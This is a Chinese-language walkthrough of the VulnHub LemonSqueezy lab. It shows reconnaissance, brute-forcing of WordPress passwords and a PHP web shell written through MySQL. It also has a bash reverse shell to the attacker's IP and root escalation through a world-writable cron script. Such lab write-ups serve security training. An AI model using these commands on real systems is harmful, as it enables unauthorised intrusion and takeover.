【LEMONSQUEEZY: 1【mysql写shell】】

前期环境准备

靶机下载地址
https://vulnhub.com/entry/lemonsqueezy-1%2C473/

在这里插入图片描述

信息收集

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -sP 192.168.47.1/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:02 CST
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.47.1
Host is up (0.00061s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.177
Host is up (0.00012s latency).
MAC Address: 00:0C:29:E2:78:CF (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000075s latency).
MAC Address: 00:50:56:FD:24:81 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.43 seconds

靶机ip为

192.168.47.177

进行全面端口探测,看开放了哪些端口和服务

──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -p- 192.168.47.177 -A -T4 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:03 CST
Nmap scan report for 192.168.47.177
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:E2:78:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.47.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

只开放了http服务,很有限
是apache的默认页面
在这里插入图片描述
尝试一下是否存在robots.txt页面
手工基本探测不存在
扫描一下

dirb 目录扫描

dirb用小字典进行扫描一下(特点是先广度后深度的扫描)

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# dirb http://192.168.47.177/ /usr/share/wordlists/dirb/small.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 20 14:06:54 2024
URL_BASE: http://192.168.47.177/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt

-----------------

GENERATED WORDS: 959                                                           

---- Scanning URL: http://192.168.47.177/ ----
==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/                                                                                                        
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/javascript/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/es/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/images/                                                                                                    
==> DIRECTORY: http://192.168.47.177/manual/style/                                                                                                     
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/doc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/js/                                                                                                    
==> DIRECTORY: http://192.168.47.177/phpmyadmin/libraries/                                                                                             
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/                                                                                                 
==> DIRECTORY: http://192.168.47.177/phpmyadmin/sql/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/templates/                                                                                             
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/wordpress/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/en/ssl/                                                                                                    
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/ ----
==> DIRECTORY: http://192.168.47.177/manual/es/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/es/ssl/                                                                                                    
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/lib/                                                                                             
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/misc/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/ssl/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/misc/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/ssl/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Mar 20 14:07:04 2024
DOWNLOADED: 11508 - FOUND: 0
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

找到几个目录

==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/     

访问/manual是apache的默认手册页面
在这里插入图片描述

访问/phpmyadmin
需要账号密码
在这里插入图片描述

访问/wordpress

在这里插入图片描述

wpscan扫描

这里首先从抓个wordpress进行入手
因为有专门的扫描工具
http://192.168.47.177/wordpress/

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:11:45 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:11:50 2024
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 46.925 KB
[+] Data Received: 21.056 MB
[+] Memory used: 223.922 MB
[+] Elapsed time: 00:00:05

可以得到一些信息
枚举一下用户

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u         
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:20:28 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:20:28 2024
[+] Requests Done: 14
[+] Cached Requests: 41
[+] Data Sent: 3.992 KB
[+] Data Received: 11.639 KB
[+] Memory used: 161.723 MB
[+] Elapsed time: 00:00:00
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

有两个用户

orange
lemon

尝试爆破用户密码

爆破出一个用户的密码

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:25:39 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger                                                                                                                             
^Cying lemon / money Time: 00:00:06 <                                                                           > (875 / 28688947)  0.00%  ETA: 56:22:35
[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPScan API Token given, as a result vulnerability data has not been output.                              > (880 / 28688947)  0.00%  ETA: 56:21:29
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:25:48 2024
[+] Requests Done: 900
[+] Cached Requests: 42
[+] Data Sent: 483.302 KB
[+] Data Received: 545.76 KB
[+] Memory used: 153.785 MB
[+] Elapsed time: 00:00:09

Scan Aborted: Canceled by User
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

尝试登录这两个系统
wordpress和phpmyadmin
orange / ginger

在这里插入图片描述

成功登录,但是功能点很少,应该不是管理员用户

phpmyadmin登录不进去

信息收集中得到下面这个很像密码的字符串
n0t1n@w0rdl1st!
在这里插入图片描述

尝试登录phpmyadmin
在这里插入图片描述

成功登录!

在这里插入图片描述
这里可以直接覆盖lemmon的hash值,因为已经知道了orange的密码
在这里插入图片描述
成功登录lemmon
在这里插入图片描述

phpmyadmin写shell

本来想从这个后台入手的,但是phpmyadmin如果有写入的权限,直接就可以写入shell了

直接写入apache的默认路径,没有权限
在这里插入图片描述

那wordpress的呢?

select '<?php phpinfo();system($_GET[1]); into outfile '/var/www/html/wordpress/1.php'?>'

在这里插入图片描述

成功getshell
在这里插入图片描述

反弹shell

然后是反弹shell
在这里插入图片描述

bash -c "bash -i >& /dev/tcp/192.168.47.156/9999 0>&1"

防止&的影响url编码一下
在这里插入图片描述

反弹shell成功
在这里插入图片描述

升级一下shell

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nc -lvvp 9999                                 
listening on [any] 9999 ...
192.168.47.177: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.177] 45450
bash: cannot set terminal process group (557): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
not a tty
www-data@lemonsqueezy:/var/www/html/wordpress$ which python
which python
/usr/bin/python
www-data@lemonsqueezy:/var/www/html/wordpress$ python -c "import pty;pty.spawn('/bin/bash')"
<ress$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
/dev/pts/0
www-data@lemonsqueezy:/var/www/html/wordpress$ export TERM=xterm
export TERM=xterm
www-data@lemonsqueezy:/var/www/html/wordpress$ clear

升级tty,设置清屏

是否有suid提权

www-data@lemonsqueezy:/var/www/html/wordpress$ find / -perm -4000 -type f 2>/dev/null
/null/ -perm -4000 -type f 2>/dev/
/usr/sbin/pppd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/ping
/bin/mount
/bin/fusermount

得到用户flag,在/var/www目录下

cd www
www-data@lemonsqueezy:/var/www$ ls
ls
html  user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$ echo 'TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | base64 -d
base64 -dzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | b
Music can change your life, base64: invalid input
www-data@lemonsqueezy:/var/www$ 

计划任务提权

查看一下计划任务

www-data@lemonsqueezy:/var/www$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#

多出来一个
/etc/logrotate.d/logrotate

看一下这个程序的权限,如果是777的话,那就是所有用户都可以编辑,就可以以root身份运行

在这里插入图片描述

真的是777,那这样就可以直接编辑提权了

先备份这个文件

www-data@lemonsqueezy:/etc/logrotate.d$ cp logrotate /var/www/html/wordpress/logrotate.bak
rotate.bakte /var/www/html/wordpress/logr
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash' >> logrotate
echo 'chmod +s /bin/bash' >> logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /tmp/* ')
except:
    sys.exit()
chmod +s /bin/bash
www-data@lemonsqueezy:/etc/logrotate.d$ ls -la /bin/bash
ls -la /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

直接添加,会有其他数据的影响,还是直接覆盖试一下

www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash ' > logrotate
echo 'chmod +s /bin/bash ' > logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
chmod +s /bin/bash 
www-data@lemonsqueezy:/etc/logrotate.d$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

变化
在这里插入图片描述

直接提权

www-data@lemonsqueezy:/etc/logrotate.d$ bash -p
bash -p
bash-4.4# whoami
whoami
root
bash-4.4# pwd
pwd
/etc/logrotate.d
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.txt
bash-4.4# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
bash-4.4# 

至此这个靶机复现就结束了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/473668.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

目标检测——YOLOR算法解读

论文&#xff1a;YOLOR-You Only Learn One Representation: Unifified Network for Multiple Tasks 作者&#xff1a;Chien-Yao Wang, I-Hau Yeh, Hong-Yuan Mark Liao 链接&#xff1a;https://arxiv.org/abs/2105.04206 代码&#xff1a;https://github.com/WongKinYiu/yolo…

使用ansible批量修改操作系统管理员账号密码

一、ansible server端配置 1、对于Linux主机配置免密登录ssh-copy-id -i ~/.ssh/id_rsa.pub rootremote_ip 2、在/etc/ansible/hosts文件中添加相应主机IP 3、对于Windows主机需要在/etc/ansible/hosts文件中进行以下配置 192.168.83.132 ansible_ssh_useradministrator an…

centos重启防火墙导致docker不可用

重启容器报错 错误原因 docker服务启动时定义的自定义链docker&#xff0c;由于centos7 firewall 被清掉 firewall的底层是使用iptables进行数据过滤&#xff0c;建立在iptables之上&#xff0c;这可能会与 Docker 产生冲突。 当 firewalld 启动或者重启的时候&#xff0c;将…

【大数据】Redis介绍和使用

【大数据】Redis介绍和使用 介绍服务器搭建redis支持的五种数据类型数据类型应用场景总结 介绍 Redis&#xff08;Remote Dictionary Server&#xff09;是一个开源的基于内存的数据结构存储系统&#xff0c;它提供了丰富的数据结构&#xff08;如字符串、哈希表、列表、集合、…

HTML静态网页成品作业(HTML+CSS)——动漫猫和老鼠网页(1个页面)

&#x1f389;不定期分享源码&#xff0c;关注不丢失哦 文章目录 一、作品介绍二、作品演示三、代码目录四、网站代码HTML部分代码 五、源码获取 一、作品介绍 &#x1f3f7;️本套采用HTMLCSS&#xff0c;未使用Javacsript代码&#xff0c;共有1个页面。 二、作品演示 三、代…

[C语言]——内存函数

目录 一.memcpy使用和模拟实现&#xff08;内存拷贝&#xff09; 二.memmove 使用和模拟实现 三.memset 函数的使用&#xff08;内存设置&#xff09; 四.memcmp 函数的使用 C语言中规定&#xff1a; memcpy拷贝的就是不重叠的内存memmove拷贝的就是重叠的内存但是在VS202…

Vue3组件的注册

组件是Vue.js中的一个重要概念&#xff0c;它是一种抽象&#xff0c;是一个可以复用的Vue.js实例。它拥有独一无二的组件名称&#xff0c;可以扩展HTML元素&#xff0c;以组件名称的方式作为自定义的HTML标签。 在大多数系统网页中&#xff0c;网页都包含header、body、footer…

流畅的 Python 第二版(GPT 重译)(十)

第十八章&#xff1a;with、match 和 else 块 上下文管理器可能几乎与子例程本身一样重要。我们只是初步了解了它们。[…] Basic 有一个 with 语句&#xff0c;在许多语言中都有 with 语句。但它们的功能不同&#xff0c;它们都只是做一些非常浅显的事情&#xff0c;它们可以避…

神经网络(深度学习,计算机视觉,得分函数,损失函数,前向传播,反向传播,激活函数)

目录 一、神经网络简介 二、深度学习要解决的问题 三、深度学习的应用 四、计算机视觉 五、计算机视觉面临的挑战 六、得分函数 七、损失函数 八、前向传播 九、反向传播 十、神经元的个数对结果的影响 十一、正则化与激活函数 一、神经网络简介 神经网络是一种有监督…

排水管网信息化平台:科技赋能,助力城市水环境管理升级

排水管网承担着城市污水、雨水的收集与排出的双重任务&#xff0c;是城市重要的基础设施。城市化率的不断提高&#xff0c;对城市基础设施的性能也提出了考验。 排水管网存在窨井监测设备不足、管段淤积、无序监管、污水超标排放等问题突出&#xff0c;导致部分污水直排受纳水…

数据可视化:守护食品安全的利器

在当今食品安全日益受到关注的背景下&#xff0c;数据可视化技术成为保障食品安全的重要利器。通过数据可视化&#xff0c;我们能够实时监测食品生产、加工、运输和销售等环节&#xff0c;及时发现和解决食品安全问题&#xff0c;保障公众健康。数据可视化如何为食品安全保驾护…

手撕算法-二叉搜索树的最近公共祖先

描述&#xff1a;分析&#xff1a;二叉搜索树没有相同值的节点&#xff0c;因此分别从根节点往下利用二叉搜索树较大的数在右子树&#xff0c;较小的数在左子树&#xff0c;可以轻松找到p、q&#xff1a; //节点值都不同&#xff0c;可以直接用值比较 while(node.val ! target…

Flutter Widget:State 状态管理

响应式的编程框架永恒的主题——“状态(State)管理” 无论是在 React/Vue/Flutter 中讨论的问题和解决的思想都是一致的。 StatefulWidget的状态应该被谁管理&#xff1f;Widget本身&#xff1f;父 Widget &#xff1f;都会&#xff1f;还是另一个对象&#xff1f; 下面是官…

【每日一题】1969. 数组元素的最小非零乘积-2024.3.20

题目&#xff1a; 1969. 数组元素的最小非零乘积 给你一个正整数 p 。你有一个下标从 1 开始的数组 nums &#xff0c;这个数组包含范围 [1, 2p - 1] 内所有整数的二进制形式&#xff08;两端都 包含&#xff09;。你可以进行以下操作 任意 次&#xff1a; 从 nums 中选择两…

Java与Go:指针

在计算机内存中&#xff0c;每个变量都有一个唯一的地址&#xff0c;指针就是用来保存这个地址的变量。通过指针&#xff0c;我们可以间接地访问和修改存储在该地址处的数据。今天我们来聊一聊Java和Go指针&#xff0c;预告一下&#xff0c;我们需要借助C语言做一些小小的比较。…

SQL61 检索并列出已订购产品的清单

order by cust_name 升序 order by cust_name desc 降序

计算机网络面经-什么是IPv4和IPv6?

前言 Internet协议&#xff08;IP&#xff09;是为连接到Internet网络的每个设备分配的数字地址。它类似于电话号码&#xff0c;是一种独特的数字组合&#xff0c;允许用户与他人通信。IP地址主要有两个主要功能。首先&#xff0c;有了IP&#xff0c;用户能够在Internet上被识别…

腾讯云GPU云服务器简介_GPU服务器购买指南_GPU云服务器操作

腾讯云GPU服务器是提供GPU算力的弹性计算服务&#xff0c;腾讯云GPU服务器具有超强的并行计算能力&#xff0c;可用于深度学习训练、科学计算、图形图像处理、视频编解码等场景&#xff0c;腾讯云百科txybk.com整理腾讯云GPU服务器租用价格表、GPU实例优势、GPU解决方案、GPU软…

One Nav一为主题最新V4.1602版官方正版学习版

在现今数字化快速发展的时代&#xff0c;信息的获取与整合变得愈发重要。为此&#xff0c;我们推出了一款功能强大且独具特色的WordPress主题——One Nav&#xff0c;又称“一导航主题”。这款主题集网址、app、资源、书籍、影视等内容导航于一体&#xff0c;为用户提供了一站式…

java NIO群聊系统

demo要求&#xff1a; 1&#xff09;编写一个NIO群聊系统&#xff0c;实现服务器端和客户端之间的数据简单通讯&#xff08;非阻塞&#xff09; 2&#xff09;实现多人群聊 3&#xff09;服务器端&#xff1a;可以监测用户上线&#xff0c;离线&#xff0c;并实现消息转发功…